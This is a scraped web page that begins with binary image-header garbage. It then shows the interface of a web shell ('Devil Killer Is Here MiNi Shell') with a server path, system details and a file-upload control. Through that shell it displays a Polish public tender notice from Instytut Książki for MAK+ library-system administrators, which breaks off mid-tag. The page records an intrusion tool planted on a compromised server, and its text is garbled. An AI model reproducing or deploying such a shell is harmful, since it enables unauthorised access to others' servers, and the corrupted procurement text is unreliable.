JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241115/0059826101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa zapewnienia administratorów systemu bibliotecznego MAK+ w podziale na cztery części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Instytut Książki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 528799030</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wróblewskiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-148</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@instytutksiazki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.instytutksiazki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa zapewnienia administratorów systemu bibliotecznego MAK+ w podziale na cztery części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-28c9f711-87a8-4d55-9b79-389fc93b9093</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00598261</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00416266/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Zapewnienie administratorów systemu bibliotecznego MAK+ w podziale na 4 części</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/instytutksiazki <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/instytutksiazki</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">SPOSÓB KOMUNIKACJI W POSTĘPOWANIU, ŚRODKI KOMUNIKACJI ELEKTRONICZNEJ I OSOBY WYZNCZONE DO KOMUNIKOWANIA SIĘ Z WYKONAWCAMI.<br/>1.	Sposób Komunikowania się z Wykonawcami:<br/>1.1.	W postępowaniu Zamawiający wymaga przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Open Nexus znajdującej się pod adresem: https://platformazakupowa.pl/pn/instytutksiazki <br/>Poniżej przydatne linki:<br/>1.1.1.	Pełna instrukcja tekstowa składania ofert, wysyłania wiadomości w postępowaniach przetargowych:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/>1.1.2.	Przykładowe składanie oferty, wysyłanie wiadomości w postępowaniach przetargowych <br/>https://docs.google.com/document/d/1S_1GyJ5TQoDkIwMQKOcKtU31hkOVU3ZEMqrSXyA2g8w/edit#heading=h.6jynaot9cbnq<br/>1.1.3.	Wycofanie / ponowne złożenie oferty<br/>https://docs.google.com/document/d/1BHwZdDEYivo9KKZFgRD9F-HgHDl1Y-6n9kNu_q9FGBc/edit#heading=h.6jynaot9cbnq<br/>1.2.	Oferty i oświadczenia, o których mowa w art. 125 ust. 1 ustawy składa się pod rygorem nieważności w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym). Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów przekazywanych w postępowaniu uważa się datę ich złożenia/wysłania na Platformie, poniżej wskazówki na temat podpisów elektronicznych:<br/>https://docs.google.com/document/d/1o9OLtTMw2wVRBTH_Pqn7BAayn3KVelcqlZ27ryhIVVw/edit<br/><br/>1.3.	Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu; <br/>2.	Ogólne zasady korzystania z Platformy:<br/>2.1.	Zgłoszenie/przystąpienie do postępowania wymaga zalogowania Wykonawcy do Systemu Open Nexus. Możliwe jest też składanie ofert bez logowania jednak dla gwarancji pełnej funkcjonalności systemu zalecamy utworzenie konta i logowanie. Konto na Open Nexus jest bezpłatne.<br/>2.2.	Po założeniu konta Wykonawca ma możliwość złożenia oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania przez Platformę zawiadomień oraz informacji przyjmuje się datę ich wysłania za pośrednictwem Platformy<br/>Rejestracja, logowanie oraz reset hasła:<br/>https://docs.google.com/document/d/1CETIe4hPE_fnKCUjWGpnw9yWhdbtc0YTlqtgUxMAwRo/edit#heading=h.6jynaot9cbnq<br/>2.3.	Zamawiający, określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/> - Minimalne wymagania techniczne umożliwiające korzystanie ze Strony platformazakupowa.pl to przeglądarka internetowa EDGE, Chrome lub FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki typu „cookies” oraz łącze internetowe o przepustowości co najmniej 256 kbit/s. platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli<br/>- zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.;<br/>- dopuszcza się podpisanie dokumentów w formacie innym niż .pdf, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć oddzielny plik z podpisem;<br/>- szczegóły pod adresem: https://platformazakupowa.pl/strona/regulamin (Prosimy o zapoznanie się)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z postanowieniami części XXIII SWZ &#34;OCHRONA DANYCH OSOBOWYCH&#34;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z postanowieniami części XXIII SWZ &#34;OCHRONA DANYCH OSOBOWYCH&#34;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OZP.261.10.2024/ZP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a)	Część nr 1 – administrator wsparcia dla obszaru północno-wschodniej Polski obejmujący województwa: warmińsko-mazurskie, podlaskie, lubelskie oraz północno-wschodnią część województwa mazowieckiego tj. powiaty: mławski, przasnyski, ostrołęcki, ciechanowski, makowski, ostrowski, węgrowski, sokołowski, siedlecki i łosicki, wraz z miastami na prawach powiatu znajdującymi się na wskazanym obszarze </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72253200-5 - Usługi w zakresie wsparcia systemu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72260000-5 - Usługi w zakresie oprogramowania</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <p class="mb-0">72261000-2 - Usługi pomocnicze w zakresie oprogramowania</p> <p class="mb-0">72224100-2 - Usługi w zakresie planowania wdrażania systemu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie (D) osoby realizującej przedmiot zamówienia w bezpośredniej dwuletniej/trzyletniej obsłudze systemu MAK + jako administrator</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie (S) osoby realizującej przedmiot zamówienia w bezpośredniej rocznej/dwuletniej obsłudze systemu MAK + na poziomie szkolącego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.2.	Część nr 2 – administrator poziom 2 linii wsparcia dla obszaru centralnej<br/>Polski obejmujący województwa: kujawsko-pomorskie, łódzkie, pozostałą<br/>część województwa mazowieckiego tj. powiaty: żuromiński, sierpecki,<br/>płocki, płoński, pułtuski, wyszkowski, gostyniński, sochaczewski,<br/>warszawski zachodni, nowodworski, legionowski, wołomiński, żyrardowski,<br/>grodziski, pruszkowski, piaseczyński, otwocki, miński, grójecki,<br/>garwoliński, białobrzeski, kozienicki, przysuski, szydłowiecki, radomski,<br/>zwoleński i lipski, wraz z miastami na prawach powiatu znajdującymi się na<br/>wskazanym obszarze oraz wschodnią część województwa wielkopolskiego<br/>tj. powiaty: gnieźnieński, wrzesiński, jarociński, krotoszyński, słupecki,<br/>pleszewski, ostrowski, koniński, kaliski, ostrzeszowski, kępiński, kolski,<br/>turecki, wraz z miastami na prawach powiatu znajdującymi się na<br/>wskazanym obszarze </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72253200-5 - Usługi w zakresie wsparcia systemu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72260000-5 - Usługi w zakresie oprogramowania</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <p class="mb-0">72261000-2 - Usługi pomocnicze w zakresie oprogramowania</p> <p class="mb-0">72224100-2 - Usługi w zakresie planowania wdrażania systemu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie (D) osoby realizującej przedmiot zamówienia w bezpośredniej dwuletniej/trzyletniej obsłudze systemu MAK + jako administrator</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie (S) osoby realizującej przedmiot zamówienia w bezpośredniej rocznej/dwuletniej obsłudze systemu MAK + na poziomie szkolącego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.3.	Część nr 3 – administrator wsparcia dla obszaru północnozachodniej Polski obejmujący województwa: pomorskie, zachodniopomorskie, lubuskie, dolnośląskie oraz zachodnią część województwa wielkopolskiego tj. powiaty: złotowski, pilski, czarnkowsko-trzcianecki, chodzieski, wągrowiecki, międzychodzki, szamotulski, obornicki, poznański, nowotomyski, wolsztyński, grodziski, kościański, śremski, średzki, leszczyński, gostyński i rawicki, wraz z miastami na prawach powiatu znajdującymi się na wskazanym obszarze; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72253200-5 - Usługi w zakresie wsparcia systemu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72260000-5 - Usługi w zakresie oprogramowania</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <p class="mb-0">72261000-2 - Usługi pomocnicze w zakresie oprogramowania</p> <p class="mb-0">72224100-2 - Usługi w zakresie planowania wdrażania systemu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie (D) osoby realizującej przedmiot zamówienia w bezpośredniej rocznej/dwuletniej obsłudze systemu MAK + jako administrator</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie (S) osoby realizującej przedmiot zamówienia w bezpośredniej dwuletniej/trzyletniej obsłudze systemu MAK + na poziomie szkolącego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 4 – administrator wsparcia dla obszaru południowej Polski obejmujący województwa: świętokrzyskie, małopolskie, podkarpackie, opolskie i śląskie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72253200-5 - Usługi w zakresie wsparcia systemu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72260000-5 - Usługi w zakresie oprogramowania</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <p class="mb-0">72261000-2 - Usługi pomocnicze w zakresie oprogramowania</p> <p class="mb-0">72224100-2 - Usługi w zakresie planowania wdrażania systemu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie (D) osoby realizującej przedmiot zamówienia w bezpośredniej dwuletniej/trzyletniejobsłudze systemu MAK + jako administrator</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie (S) osoby realizującej przedmiot zamówienia w bezpośredniej dwuletniej/trzyletniejobsłudze systemu MAK + na poziomie szkolącego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 